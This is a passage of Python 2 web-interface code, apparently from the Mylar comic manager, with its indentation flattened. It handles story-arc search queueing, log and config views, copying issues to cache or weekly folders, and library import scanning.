threading.Thread(target=self.ReadGetWanted, kwargs=kwargs).start()
SearchArcIssues.exposed = True
def ReadGetWanted(self, StoryArcID):
# this will queue up (ie. make 'Wanted') issues in a given Story Arc that are 'Not Watched'
stupdate = []
mode = 'story_arc'
myDB = db.DBConnection()
wantedlist = myDB.select("SELECT * FROM storyarcs WHERE StoryArcID=? AND Status != 'Downloaded' AND Status !='Archived' AND Status !='Snatched'", [StoryArcID])
if wantedlist is not None:
for want in wantedlist:
print want
issuechk = myDB.selectone("SELECT a.Type, a.ComicYear, b.ComicName, b.Issue_Number, b.ComicID, b.IssueID FROM comics as a INNER JOIN issues as b on a.ComicID = b.ComicID WHERE b.IssueID=?", [want['IssueArcID']]).fetchone()
SARC = want['StoryArc']
IssueArcID = want['IssueArcID']
Publisher = want['Publisher']
if issuechk is None:
# none means it's not a 'watched' series
s_comicid = want['ComicID'] #None
s_issueid = want['IssueArcID'] #None
BookType = want['Type']
stdate = want['ReleaseDate']
issdate = want['IssueDate']
logger.fdebug("-- NOT a watched series queue.")
logger.fdebug('%s -- #%s' % (want['ComicName'], want['IssueNumber']))
logger.fdebug('Story Arc %s : queueing the selected issue...' % SARC)
logger.fdebug('IssueArcID : %s' % IssueArcID)
logger.fdebug('ComicID: %s --- IssueID: %s' % (s_comicid, s_issueid)) # no comicid in issues table.
logger.fdebug('ReleaseDate: %s --- IssueDate: %s' % (stdate, issdate))
issueyear = want['IssueYEAR']
logger.fdebug('IssueYear: %s' % issueyear)
if issueyear is None or issueyear == 'None':
try:
logger.fdebug('issdate:' + str(issdate))
issueyear = issdate[:4]
if not issueyear.startswith('19') and not issueyear.startswith('20'):
issueyear = stdate[:4]
except:
issueyear = stdate[:4]
logger.fdebug('ComicYear: %s' % want['SeriesYear'])
passinfo = {'issueid': s_issueid,
'comicname': want['ComicName'],
'seriesyear': want['SeriesYear'],
'comicid': s_comicid,
'issuenumber': want['IssueNumber'],
'booktype': BookType}
#oneoff = True ?
else:
# it's a watched series
s_comicid = issuechk['ComicID']
s_issueid = issuechk['IssueID']
logger.fdebug("-- watched series queue.")
logger.fdebug('%s --- #%s' % (issuechk['ComicName'], issuechk['Issue_Number']))
passinfo = {'issueid': s_issueid,
'comicname': issuechk['ComicName'],
'seriesyear': issuechk['SeriesYear'],
'comicid': s_comicid,
'issuenumber': issuechk['Issue_Number'],
'booktype': issuechk['Type']}
mylar.SEARCH_QUEUE.put(passinfo)
#if foundcom['status'] is True:
#    logger.fdebug('successfully found.')
# #update the status - this is necessary for torrents as they are in 'snatched' status.
# updater.foundsearch(s_comicid, s_issueid, mode=mode, provider=prov, SARC=SARC, IssueArcID=IssueArcID)
#else:
#    logger.fdebug('not successfully found.')
# stupdate.append({"Status": "Wanted",
# "IssueArcID": IssueArcID,
# "IssueID": s_issueid})
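#now queue up any arc issues already flagged as Wanted, regardless of whether the series is on the watchlist.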
watchlistchk = myDB.select("SELECT * FROM storyarcs WHERE StoryArcID=? AND Status='Wanted'", [StoryArcID])
if watchlistchk is not None:
for watchchk in watchlistchk:
logger.fdebug('Watchlist hit - %s' % watchchk['ComicName'])
issuechk = myDB.selectone("SELECT a.Type, a.ComicYear, b.ComicName, b.Issue_Number, b.ComicID, b.IssueID FROM comics as a INNER JOIN issues as b on a.ComicID = b.ComicID WHERE b.IssueID=?", [watchchk['IssueArcID']]).fetchone()
SARC = watchchk['StoryArc']
IssueArcID = watchchk['IssueArcID']
if issuechk is None:
# none means it's not a 'watched' series
try:
s_comicid = watchchk['ComicID']
except:
s_comicid = None
try:
s_issueid = watchchk['IssueArcID']
except:
s_issueid = None
logger.fdebug("-- NOT a watched series queue.")
logger.fdebug('%s -- #%s' % (watchchk['ComicName'], watchchk['IssueNumber']))
logger.fdebug('Story Arc : %s queueing up the selected issue...' % SARC)
logger.fdebug('IssueArcID : %s' % IssueArcID)
try:
issueyear = watchchk['IssueYEAR']
logger.fdebug('issueYEAR : %s' % issueyear)
except:
try:
issueyear = watchchk['IssueDate'][:4]
except:
issueyear = watchchk['ReleaseDate'][:4]
stdate = watchchk['ReleaseDate']
issdate = watchchk['IssueDate']
logger.fdebug('issueyear : %s' % issueyear)
logger.fdebug('comicname : %s' % watchchk['ComicName'])
logger.fdebug('issuenumber : %s' % watchchk['IssueNumber'])
logger.fdebug('comicyear : %s' % watchchk['SeriesYear'])
#logger.info('publisher : ' + watchchk['IssuePublisher']) <-- no publisher in table
logger.fdebug('SARC : %s' % SARC)
logger.fdebug('IssueArcID : %s' % IssueArcID)
passinfo = {'issueid': s_issueid,
'comicname': watchchk['ComicName'],
'seriesyear': watchchk['SeriesYear'],
'comicid': s_comicid,
'issuenumber': watchchk['IssueNumber'],
'booktype': watchchk['Type']}
#foundcom, prov = search.search_init(ComicName=watchchk['ComicName'], IssueNumber=watchchk['IssueNumber'], ComicYear=issueyear, SeriesYear=watchchk['SeriesYear'], Publisher=None, IssueDate=issdate, StoreDate=stdate, IssueID=s_issueid, SARC=SARC, IssueArcID=IssueArcID, oneoff=True)
else:
# it's a watched series
s_comicid = issuechk['ComicID']
s_issueid = issuechk['IssueID']
logger.fdebug('-- watched series queue.')
logger.fdebug('%s -- #%s' % (issuechk['ComicName'], issuechk['Issue_Number']))
passinfo = {'issueid': s_issueid,
'comicname': issuechk['ComicName'],
'seriesyear': issuechk['SeriesYear'],
'comicid': s_comicid,
'issuenumber': issuechk['Issue_Number'],
'booktype': issuechk['Type']}
#foundcom, prov = search.search_init(ComicName=issuechk['ComicName'], IssueNumber=issuechk['Issue_Number'], ComicYear=issuechk['IssueYear'], SeriesYear=issuechk['SeriesYear'], Publisher=None, IssueDate=None, StoreDate=issuechk['ReleaseDate'], IssueID=issuechk['IssueID'], AlternateSearch=None, UseFuzzy=None, ComicVersion=None, SARC=SARC, IssueArcID=IssueArcID, mode=None, rsscheck=None, ComicID=None)
mylar.SEARCH_QUEUE.put(passinfo)
#if foundcom['status'] is True:
# updater.foundsearch(s_comicid, s_issueid, mode=mode, provider=prov, SARC=SARC, IssueArcID=IssueArcID)
#else:
#    logger.fdebug('Watchlist issue not successfully found')
# logger.fdebug('issuearcid: %s' % IssueArcID)
# logger.fdebug('issueid: %s' % s_issueid)
# stupdate.append({"Status": "Wanted",
# "IssueArcID": IssueArcID,
# "IssueID": s_issueid})
if len(stupdate) > 0:
logger.fdebug('%s issues need to get updated to Wanted Status' % len(stupdate))
for st in stupdate:
ctrlVal = {'IssueArcID': st['IssueArcID']}
newVal = {'Status': st['Status']}
if st['IssueID']:
logger.fdebug('issueid: %s' % st['IssueID'])
newVal['IssueID'] = st['IssueID']
myDB.upsert("storyarcs", newVal, ctrlVal)
ReadGetWanted.exposed = True
def ReadMassCopy(self, StoryArcID, StoryArcName):
#this copies entire story arcs into the /cache/<storyarc> folder
#alternatively, it will copy the issues individually directly to a 3rd party device (ie.tablet)
myDB = db.DBConnection()
copylist = myDB.select("SELECT * FROM readlist WHERE StoryArcID=? AND Status='Downloaded'", [StoryArcID])
if copylist is None:
logger.fdebug("You don't have any issues from " + StoryArcName + ". Aborting Mass Copy.")
return
else:
dst = os.path.join(mylar.CONFIG.CACHE_DIR, StoryArcName)
for files in copylist:
copyloc = files['Location']
ReadMassCopy.exposed = True
def logs(self):
return serve_template(templatename="logs.html", title="Log", lineList=mylar.LOGLIST)
logs.exposed = True
def config_dump(self):
return serve_template(templatename="config_dump.html", title="Config Listing", lineList=mylar.CONFIG)
config_dump.exposed = True
def clearLogs(self):
mylar.LOGLIST = []
logger.info("Web logs cleared")
raise cherrypy.HTTPRedirect("logs")
clearLogs.exposed = True
def toggleVerbose(self):
if mylar.LOG_LEVEL != 2:
mylar.LOG_LEVEL = 2
else:
mylar.LOG_LEVEL = 1
if logger.LOG_LANG.startswith('en'):
logger.initLogger(console=not mylar.QUIET, log_dir=mylar.CONFIG.LOG_DIR, max_logsize=mylar.CONFIG.MAX_LOGSIZE, max_logfiles=mylar.CONFIG.MAX_LOGFILES, loglevel=mylar.LOG_LEVEL)
else:
logger.mylar_log.stopLogger()
logger.mylar_log.initLogger(loglevel=mylar.LOG_LEVEL, log_dir=mylar.CONFIG.LOG_DIR, max_logsize=mylar.CONFIG.MAX_LOGSIZE, max_logfiles=mylar.CONFIG.MAX_LOGFILES)
#mylar.VERBOSE = not mylar.VERBOSE
#logger.initLogger(console=not mylar.QUIET,
# log_dir=mylar.CONFIG.LOG_DIR, verbose=mylar.VERBOSE)
if mylar.LOG_LEVEL == 2:
logger.info("Verbose (DEBUG) logging is enabled")
logger.debug("If you can read this message, debug logging is now working")
else:
logger.info("normal (INFO) logging is now enabled")
raise cherrypy.HTTPRedirect("logs")
toggleVerbose.exposed = True
def getLog(self, iDisplayStart=0, iDisplayLength=100, iSortCol_0=0, sSortDir_0="desc", sSearch="", **kwargs):
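#server-side processing endpoint for the DataTables-driven log view: filters, sorts and pages mylar.LOGLIST.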
iDisplayStart = int(iDisplayStart)
iDisplayLength = int(iDisplayLength)
filtered = []
if sSearch == "" or sSearch == None:
filtered = mylar.LOGLIST[::]
else:
filtered = [row for row in mylar.LOGLIST for column in row if sSearch.lower() in column.lower()]
sortcolumn = 0
if iSortCol_0 == '1':
sortcolumn = 2
elif iSortCol_0 == '2':
sortcolumn = 1
filtered.sort(key=lambda x: x[sortcolumn], reverse=sSortDir_0 == "desc")
rows = filtered[iDisplayStart:(iDisplayStart + iDisplayLength)]
rows = [[row[0], row[2], row[1]] for row in rows]
return json.dumps({
'iTotalDisplayRecords': len(filtered),
'iTotalRecords': len(mylar.LOGLIST),
'aaData': rows,
})
getLog.exposed = True
def getConfig(self, iDisplayStart=0, iDisplayLength=100, iSortCol_0=0, sSortDir_0="desc", sSearch="", **kwargs):
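#server-side processing endpoint for the config listing: flattens the config sections into (key, value) rows for DataTables.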
iDisplayStart = int(iDisplayStart)
iDisplayLength = int(iDisplayLength)
unfiltered = []
for each_section in mylar.config.config.sections():
for k,v in mylar.config.config.items(each_section):
unfiltered.insert( 0, (k, v.decode('utf-8')) )
if sSearch == "" or sSearch == None:
logger.info('getConfig: No search terms.')
filtered = unfiltered
else:
logger.info('getConfig: Searching for ' + sSearch)
dSearch = {sSearch: '.'}
filtered = [row for row in unfiltered for column in row if sSearch.lower() in column.lower()]
sortcolumn = 0
if iSortCol_0 == '1':
sortcolumn = 2
elif iSortCol_0 == '2':
sortcolumn = 1
filtered.sort(key=lambda x: x[sortcolumn], reverse=sSortDir_0 == "desc")
rows = filtered[iDisplayStart:(iDisplayStart + iDisplayLength)]
return json.dumps({
'iTotalDisplayRecords': len(filtered),
'iTotalRecords': len(unfiltered),
'aaData': rows,
})
getConfig.exposed = True
def clearhistory(self, type=None):
myDB = db.DBConnection()
if type == 'all':
logger.info(u"Clearing all history")
myDB.action('DELETE from snatched')
else:
logger.info(u"Clearing history where status is %s" % type)
myDB.action('DELETE from snatched WHERE Status=?', [type])
if type == 'Processed':
myDB.action("DELETE from snatched WHERE Status='Post-Processed'")
raise cherrypy.HTTPRedirect("history")
clearhistory.exposed = True
def downloadLocal(self, IssueID=None, IssueArcID=None, ReadOrder=None, dir=None):
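#copies the physical file for a given issue into the cache directory (or the supplied dir) and updates the readlist/issues/storyarcs tables so the download link becomes available.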
myDB = db.DBConnection()
issueDL = myDB.selectone("SELECT * FROM issues WHERE IssueID=?", [IssueID]).fetchone()
comicid = issueDL['ComicID']
#print ("comicid: " + str(comicid))
comic = myDB.selectone("SELECT * FROM comics WHERE ComicID=?", [comicid]).fetchone()
#---issue info
comicname = comic['ComicName']
issuenum = issueDL['Issue_Number']
issuedate = issueDL['IssueDate']
seriesyear = comic['ComicYear']
#---
issueLOC = comic['ComicLocation']
#print ("IssueLOC: " + str(issueLOC))
issueFILE = issueDL['Location']
#print ("IssueFILE: "+ str(issueFILE))
issuePATH = os.path.join(issueLOC, issueFILE)
#print ("IssuePATH: " + str(issuePATH))
# if dir is None, it's a normal copy to cache kinda thing.
# if dir is a path, then it's coming from the pullist as the location to put all the weekly comics
if dir is not None:
dstPATH = dir
else:
dstPATH = os.path.join(mylar.CONFIG.CACHE_DIR, issueFILE)
#print ("dstPATH: " + str(dstPATH))
if IssueID:
ISnewValueDict = {'inCacheDIR': 'True',
'Location': issueFILE}
if IssueArcID:
if mylar.CONFIG.READ2FILENAME:
#if it's coming from a StoryArc, check to see if we're appending the ReadingOrder to the filename
ARCissueFILE = ReadOrder + "-" + issueFILE
dstPATH = os.path.join(mylar.CONFIG.CACHE_DIR, ARCissueFILE)
ISnewValueDict = {'inCacheDIR': 'True',
'Location': issueFILE}
# issueDL = myDB.action("SELECT * FROM storyarcs WHERE IssueArcID=?", [IssueArcID]).fetchone()
# storyarcid = issueDL['StoryArcID']
# #print ("comicid: " + str(comicid))
# issueLOC = mylar.CONFIG.DESTINATION_DIR
# #print ("IssueLOC: " + str(issueLOC))
# issueFILE = issueDL['Location']
# #print ("IssueFILE: "+ str(issueFILE))
# issuePATH = os.path.join(issueLOC,issueFILE)
# #print ("IssuePATH: " + str(issuePATH))
# dstPATH = os.path.join(mylar.CONFIG.CACHE_DIR, issueFILE)
# #print ("dstPATH: " + str(dstPATH))
try:
shutil.copy2(issuePATH, dstPATH)
except IOError as e:
logger.error("Could not copy " + str(issuePATH) + " to " + str(dstPATH) + ". Copy to Cache terminated.")
raise cherrypy.HTTPRedirect("comicDetails?ComicID=%s" % comicid)
#logger.debug("sucessfully copied to cache...Enabling Download link")
controlValueDict = {'IssueID': IssueID}
RLnewValueDict = {'inCacheDIR': 'True',
'Location': issueFILE,
'ComicID': comicid,
'ComicName': comicname,
'Issue_Number': issuenum,
'SeriesYear': seriesyear,
'IssueDate': issuedate}
myDB.upsert("readlist", RLnewValueDict, controlValueDict)
myDB.upsert("issues", ISnewValueDict, controlValueDict)
if IssueArcID:
controlValueD = {'IssueArcID': IssueArcID}
newValueDict = {'inCacheDIR': 'True',
'Location': ARCissueFILE}
myDB.upsert("storyarcs", newValueDict, controlValueD)
#print("DB updated - Download link now enabled.")
downloadLocal.exposed = True
def MassWeeklyDownload(self, weeknumber=None, year=None, midweek=None, weekfolder=0, filename=None):
if filename is None:
mylar.CONFIG.WEEKFOLDER = bool(int(weekfolder))
mylar.CONFIG.writeconfig(values={'weekfolder': mylar.CONFIG.WEEKFOLDER})
raise cherrypy.HTTPRedirect("pullist")
# this will download all downloaded comics from the weekly pull list and throw them
# into a 'weekly' pull folder for those wanting to transfer directly to a 3rd party device.
myDB = db.DBConnection()
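#determine the destination folder - either a dated weekly folder (if enabled) or the grab-bag directory.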
if mylar.CONFIG.WEEKFOLDER:
if mylar.CONFIG.WEEKFOLDER_LOC:
dstdir = mylar.CONFIG.WEEKFOLDER_LOC
else:
dstdir = mylar.CONFIG.DESTINATION_DIR
if mylar.CONFIG.WEEKFOLDER_FORMAT == 0:
#0 = YYYY-mm
desdir = os.path.join(dstdir, str(year) + '-' + str(weeknumber))
elif mylar.CONFIG.WEEKFOLDER_FORMAT == 1:
#1 = YYYY-mm-dd (midweek)
desdir = os.path.join(dstdir, str(midweek))
chkdir = filechecker.validateAndCreateDirectory(desdir, create=True, module='WEEKLY-FOLDER')
if not chkdir:
logger.warn('Unable to create weekly directory. Check location & permissions. Aborting Copy.')
return
else:
desdir = mylar.CONFIG.GRABBAG_DIR
issuelist = helpers.listIssues(weeknumber,year)
if issuelist is None: # nothing on the list, just go go gone
logger.info("There aren't any issues downloaded from this week yet.")
else:
iscount = 0
for issue in issuelist:
#logger.fdebug('Checking status of ' + issue['ComicName'] + ' #' + str(issue['Issue_Number']))
if issue['Status'] == 'Downloaded':
logger.info('Status Downloaded.')
self.downloadLocal(issue['IssueID'], dir=desdir)
logger.info("Copied " + issue['ComicName'] + " #" + str(issue['Issue_Number']) + " to " + desdir.encode('utf-8').strip())
iscount+=1
logger.info('I have copied ' + str(iscount) + ' issues from week #' + str(weeknumber) + ' pullist as requested.')
raise cherrypy.HTTPRedirect("pullist?week=%s&year=%s" % (weeknumber, year))
MassWeeklyDownload.exposed = True
def idirectory(self):
return serve_template(templatename="idirectory.html", title="Import a Directory")
idirectory.exposed = True
def confirmResult(self, comicname, comicid):
mode='series'
sresults = mb.findComic(comicname, mode, None)
type='comic'
return serve_template(templatename="searchresults.html", title='Import Results for: "' + comicname + '"', searchresults=sresults, type=type, imported='confirm', ogcname=comicid)
confirmResult.exposed = True
def Check_ImportStatus(self):
#logger.info('import_status: ' + mylar.IMPORT_STATUS)
return mylar.IMPORT_STATUS
Check_ImportStatus.exposed = True
def comicScan(self, path, scan=0, libraryscan=0, redirect=None, autoadd=0, imp_move=0, imp_paths=0, imp_rename=0, imp_metadata=0, forcescan=0):
import Queue
queue = Queue.Queue()
#save the values so they stick.
mylar.CONFIG.ADD_COMICS = autoadd
#too many problems for windows users, have to rethink this....
#if 'windows' in mylar.OS_DETECT.lower() and '\\\\?\\' not in path:
# #to handle long paths, let's append the '\\?\' to the path to allow for unicode windows api access
# path = "\\\\?\\" + path
mylar.CONFIG.COMIC_DIR = path
mylar.CONFIG.IMP_MOVE = bool(imp_move)
mylar.CONFIG.IMP_RENAME = bool(imp_rename)
mylar.CONFIG.IMP_METADATA = bool(imp_metadata)
mylar.CONFIG.IMP_PATHS = bool(imp_paths)
mylar.CONFIG.configure(update=True)
# Write the config
logger.info('Now updating config...')
mylar.CONFIG.writeconfig()
logger.info('forcescan is: ' + str(forcescan))
if mylar.IMPORTLOCK and forcescan == 1:
logger.info('Removing current lock on import - if you do this AND another process is legitimately running, you\'re causing your own problems.')
mylar.IMPORTLOCK = False
#thread the scan.
if scan == '1':
scan = True
mylar.IMPORT_STATUS = 'Now starting the import'
return self.ThreadcomicScan(scan, queue)
else:
scan = False
return
comicScan.exposed = True
def ThreadcomicScan(self, scan, queue):
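#runs the library scan in its own thread and relays the result back so the import button can be enabled once the scan finishes.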
thread_ = threading.Thread(target=librarysync.scanLibrary, name="LibraryScan", args=[scan, queue])
thread_.start()
thread_.join()
chk = queue.get()
while True:
if chk[0]['result'] == 'success':
yield chk[0]['result']
logger.info('Successfully scanned in directory. Enabling the importResults button now.')
mylar.IMPORTBUTTON = True #globally set it to ON after the scan so that it will be picked up.
mylar.IMPORT_STATUS = 'Import completed.'
break
else:
yield chk[0]['result']
mylar.IMPORTBUTTON = False
break
return
ThreadcomicScan.exposed = True
def importResults(self):
myDB = db.DBConnection()
results = myDB.select("SELECT * FROM importresults WHERE WatchMatch is Null OR WatchMatch LIKE 'C%' group by DynamicName, Volume, Status COLLATE NOCASE")
#this is to get the count of issues;
res = []
countit = []
ann_cnt = 0
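#tally the issue (and annual) counts per distinct series grouping for display on the import results page.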
for result in results:
res.append(result)
for x in res:
if x['Volume']:
#because Volume gets stored as NULL in the db, we need to account for it coming into here as a possible None value.
countthis = myDB.select("SELECT count(*) FROM importresults WHERE DynamicName=? AND Volume=? AND Status=?", [x['DynamicName'],x['Volume'],x['Status']])
countannuals = myDB.select("SELECT count(*) FROM importresults WHERE DynamicName=? AND Volume=? AND IssueNumber LIKE 'Annual%' AND Status=?", [x['DynamicName'],x['Volume'],x['Status']])
else:
countthis = myDB.select("SELECT count(*) FROM importresults WHERE DynamicName=? AND Volume IS NULL AND Status=?", [x['DynamicName'],x['Status']])
countannuals = myDB.select("SELECT count(*) FROM importresults WHERE DynamicName=? AND Volume IS NULL AND IssueNumber LIKE 'Annual%' AND Status=?", [x['DynamicName'],x['Status']])
countit.append({"DynamicName": x['DynamicName'],
"Volume": x['Volume'],
"IssueCount": countthis[0][0],
"AnnualCount": countannuals[0][0],
"ComicName": x['ComicName'],
"DisplayName": x['DisplayName'],
"Volume": x['Volume'],
"ComicYear": x['ComicYear'],
"Status": x['Status'],
"ComicID": x['ComicID'],
"WatchMatch": x['WatchMatch'],
"ImportDate": x['ImportDate'],
"SRID": x['SRID']})
return serve_template(templatename="importresults.html", title="Import Results", results=countit) #results, watchresults=watchresults)
importResults.exposed = True
def ImportFilelisting(self, comicname, dynamicname, volume):
comicname = urllib.unquote_plus(helpers.conversion(comicname))
dynamicname = helpers.conversion(urllib.unquote_plus(dynamicname)) #urllib.unquote(dynamicname).decode('utf-8')
myDB = db.DBConnection()
if volume is None or volume == 'None':
results = myDB.select("SELECT * FROM importresults WHERE (WatchMatch is Null OR WatchMatch LIKE 'C%') AND DynamicName=? AND Volume IS NULL",[dynamicname])
else:
if not volume.lower().startswith('v'):
volume = 'v' + str(volume)
results = myDB.select("SELECT * FROM importresults WHERE (WatchMatch is Null OR WatchMatch LIKE 'C%') AND DynamicName=? AND Volume=?",[dynamicname,volume])
filelisting = '<table width="500"><tr><td>'
filelisting += '<center><b>Files that have been scanned in for:</b></center>'
if volume is None or volume == 'None':
filelisting += '<center><b>' + comicname + '</b></center></td></tr><tr><td>'
else:
filelisting += '<center><b>' + comicname + ' [' + str(volume) + ']</b></center></td></tr><tr><td>'
#filelisting += '<div style="height:300px;overflow:scroll;overflow-x:hidden;">'
filelisting += '<div style="display:inline-block;overflow-y:auto;overflow-x:hidden;">'
cnt = 0
for result in results:
filelisting += result['ComicFilename'] + '</br>'
filelisting += '</div></td></tr>'
filelisting += '<tr><td align="right">' + str(len(results)) + ' Files.</td></tr>'
filelisting += '</table>'
return filelisting
ImportFilelisting.exposed = True
def deleteimport(self, ComicName, volume, DynamicName, Status):
myDB = db.DBConnection()
if volume is None or volume == 'None':
logname = ComicName
else:
logname = ComicName + '[' + str(volume) + ']'
logger.info("Removing import data for Comic: " + logname)
if volume is None or volume == 'None':
myDB.action('DELETE from importresults WHERE DynamicName=? AND Status=? AND (Volume is NULL OR Volume="None")', [DynamicName, Status])
else:
myDB.action('DELETE from importresults WHERE DynamicName=? AND Volume=? AND Status=?', [DynamicName, volume, Status])
raise cherrypy.HTTPRedirect("importResults")
deleteimport.exposed = True
def preSearchit(self, ComicName, comiclist=None, mimp=0, volume=None, displaycomic=None, comicid=None, dynamicname=None, displayline=None):
if mylar.IMPORTLOCK:
logger.info('[IMPORT] There is an import already running. Please wait for it to finish, and then you can resubmit this import.')
return
importlock = threading.Lock()
myDB = db.DBConnection()
if mimp == 0:
comiclist = []
comiclist.append({"ComicName": ComicName,
"DynamicName": dynamicname,
"Volume": volume,
"ComicID": comicid})
with importlock:
#set the global importlock here so that nothing runs and tries to refresh things simultaneously...
mylar.IMPORTLOCK = True
#do imports that have the comicID already present (ie. metatagging has returned valid hits).
#if a comicID is present along with an IssueID - then we have valid metadata.
#otherwise, comicID present by itself indicates a watch match that already exists and is done below this sequence.
RemoveIDS = []
for comicinfo in comiclist:
logger.fdebug('[IMPORT] Checking for any valid ComicID\'s already present within filenames.')
logger.fdebug('[IMPORT] %s:' % comicinfo)
if comicinfo['ComicID'] is None or comicinfo['ComicID'] == 'None':
continue
else:
results = myDB.select("SELECT * FROM importresults WHERE (WatchMatch is Null OR WatchMatch LIKE 'C%') AND ComicID=?", [comicinfo['ComicID']])
files = []
for result in results:
files.append({'comicfilename': result['ComicFilename'],
'comiclocation': result['ComicLocation'],
'issuenumber': result['IssueNumber'],
'import_id': result['impID']})
import random
SRID = str(random.randint(100000, 999999))
logger.info('[IMPORT] Issues found with valid ComicID information for : %s [%s]' % (comicinfo['ComicName'], comicinfo['ComicID']))
imported = {'ComicName': comicinfo['ComicName'],
'DynamicName': comicinfo['DynamicName'],
'Volume': comicinfo['Volume'],
'filelisting': files,
'srid': SRID}
self.addbyid(comicinfo['ComicID'], calledby=True, imported=imported, ogcname=comicinfo['ComicName'], nothread=True)
#if move files wasn't used - we need to update status at this point.
#if mylar.CONFIG.IMP_MOVE is False:
# #status update.
# for f in files:
# ctrlVal = {"ComicID": comicinfo['ComicID'],
# "impID": f['import_id']}
# newVal = {"Status": 'Imported',
# "SRID": SRID,
# "ComicFilename": f['comicfilename'],
# "ComicLocation": f['comiclocation'],
# "Volume": comicinfo['Volume'],
# "IssueNumber": comicinfo['IssueNumber'],
# "ComicName": comicinfo['ComicName'],
# "DynamicName": comicinfo['DynamicName']}
# myDB.upsert("importresults", newVal, ctrlVal)
logger.info('[IMPORT] Successfully verified import sequence data for : %s. Currently adding to your watchlist.' % comicinfo['ComicName'])
RemoveIDS.append(comicinfo['ComicID'])
#we need to remove these items from the comiclist now, so they don't get processed again
if len(RemoveIDS) > 0:
for RID in RemoveIDS:
newlist = [k for k in comiclist if k['ComicID'] != RID]
comiclist = newlist
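#the remaining entries have no usable ComicID - work out year ranges / issue counts from the files and query CV for matching series.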
for cl in comiclist:
ComicName = cl['ComicName']
volume = cl['Volume']
DynamicName = cl['DynamicName']
#logger.fdebug('comicname: ' + ComicName)
#logger.fdebug('dyn: ' + DynamicName)
if volume is None or volume == 'None':
comic_and_vol = ComicName
else:
comic_and_vol = '%s (%s)' % (ComicName, volume)
logger.info('[IMPORT][%s] Now preparing to import. First I need to determine the highest issue, and possible year(s) of the series.' % comic_and_vol)
if volume is None or volume == 'None':
logger.fdebug('[IMPORT] [none] dynamicname: %s' % DynamicName)
logger.fdebug('[IMPORT] [none] volume: None')
results = myDB.select("SELECT * FROM importresults WHERE DynamicName=? AND Volume IS NULL AND Status='Not Imported'", [DynamicName])
else:
logger.fdebug('[IMPORT] [!none] dynamicname: %s' % DynamicName)
logger.fdebug('[IMPORT] [!none] volume: %s' % volume)
results = myDB.select("SELECT * FROM importresults WHERE DynamicName=? AND Volume=? AND Status='Not Imported'", [DynamicName,volume])
if not results:
logger.fdebug('[IMPORT] I cannot find any results for the given series. I should remove this from the list.')
continue
#if results > 0:
# print ("There are " + str(results[7]) + " issues to import of " + str(ComicName))
#build the valid year ranges and the minimum issue# here to pass to search.
yearRANGE = []
yearTOP = 0
minISSUE = 0
startISSUE = 10000000
starttheyear = None
comicstoIMP = []
movealreadyonlist = "no"
movedata = []
for result in results:
if result is None or result == 'None':
logger.info('[IMPORT] Ultron gave me bad information, this issue won\'t import correctly: %s' % DynamicName)
break
if result['WatchMatch']:
watchmatched = result['WatchMatch']
else:
watchmatched = ''
if watchmatched.startswith('C'):
comicid = result['WatchMatch'][1:]
#since it's already in the watchlist, we just need to move the files and re-run the filechecker.
#self.refreshArtist(comicid=comicid,imported='yes')
if mylar.CONFIG.IMP_MOVE:
comloc = myDB.selectone("SELECT * FROM comics WHERE ComicID=?", [comicid]).fetchone()
movedata_comicid = comicid
movedata_comiclocation = comloc['ComicLocation']
movedata_comicname = ComicName
movealreadyonlist = "yes"
#mylar.moveit.movefiles(comicid,comloc['ComicLocation'],ComicName)
#check for existing files... (this is already called after move files in importer)
#updater.forceRescan(comicid)
else:
raise cherrypy.HTTPRedirect("importResults")
else:
#logger.fdebug('result: %s' % result)
comicstoIMP.append(result['ComicLocation']) #.decode(mylar.SYS_ENCODING, 'replace'))
getiss = result['IssueNumber']
#logger.fdebug('getiss: %s' % getiss)
if 'annual' in getiss.lower():
tmpiss = re.sub('[^0-9]','', getiss).strip()
if any([tmpiss.startswith('19'), tmpiss.startswith('20')]) and len(tmpiss) == 4:
logger.fdebug('[IMPORT] annual detected with no issue [%s]. Skipping this entry for determining series length.' % getiss)
continue
else:
if (result['ComicYear'] not in yearRANGE) or all([yearRANGE is None, yearRANGE == 'None']):
if result['ComicYear'] != "0000" and result['ComicYear'] is not None:
yearRANGE.append(str(result['ComicYear']))
yearTOP = str(result['ComicYear'])
getiss_num = helpers.issuedigits(getiss)
miniss_num = helpers.issuedigits(minISSUE)
startiss_num = helpers.issuedigits(startISSUE)
if int(getiss_num) > int(miniss_num):
logger.fdebug('Minimum issue now set to : %s - it was %s' % (getiss, minISSUE))
minISSUE = getiss
if int(getiss_num) < int(startiss_num):
logger.fdebug('Start issue now set to : %s - it was %s' % (getiss, startISSUE))
startISSUE = str(getiss)
if helpers.issuedigits(startISSUE) == 1000 and result['ComicYear'] is not None: # if it's an issue #1, get the year and assume that's the start.
starttheyear = result['ComicYear']
#taking this outside of the transaction in an attempt to stop db locking.
if mylar.CONFIG.IMP_MOVE and movealreadyonlist == "yes":
mylar.moveit.movefiles(movedata_comicid, movedata_comiclocation, movedata_comicname)
updater.forceRescan(comicid)
raise cherrypy.HTTPRedirect("importResults")
#figure out # of issues and the year range allowable
logger.fdebug('[IMPORT] yearTOP: %s' % yearTOP)
logger.fdebug('[IMPORT] yearRANGE: %s' % yearRANGE)
if starttheyear is None:
if all([yearTOP != None, yearTOP != 'None']):
if int(str(yearTOP)) > 0:
minni = helpers.issuedigits(minISSUE)
#logger.info(minni)
if minni < 1 or minni > 999999999:
maxyear = int(str(yearTOP))
else:
maxyear = int(str(yearTOP)) - ( (minni/1000) / 12 )
if str(maxyear) not in yearRANGE:
#logger.info('maxyear:' + str(maxyear))
#logger.info('yeartop:' + str(yearTOP))
for i in range(maxyear, int(yearTOP),1):
if not any(int(x) == int(i) for x in yearRANGE):
yearRANGE.append(str(i))
else:
yearRANGE = None
else:
yearRANGE = None
else:
yearRANGE.append(starttheyear)
if yearRANGE is not None:
yearRANGE = sorted(yearRANGE, reverse=True)
#determine a best-guess to # of issues in series
#this needs to be reworked / refined ALOT more.
#minISSUE = highest issue #, startISSUE = lowest issue #
numissues = len(comicstoIMP)
logger.fdebug('[IMPORT] number of issues: %s' % numissues)
ogcname = ComicName
mode='series'
displaycomic = helpers.filesafe(ComicName)
displaycomic = re.sub('[\-]','', displaycomic).strip()
displaycomic = re.sub('\s+', ' ', displaycomic).strip()
logger.fdebug('[IMPORT] displaycomic : %s' % displaycomic)
logger.fdebug('[IMPORT] comicname : %s' % ComicName)
searchterm = '"' + displaycomic + '"'
try:
if yearRANGE is None:
sresults = mb.findComic(searchterm, mode, issue=numissues) #ogcname, mode, issue=numissues, explicit='all') #ComicName, mode, issue=numissues)
else:
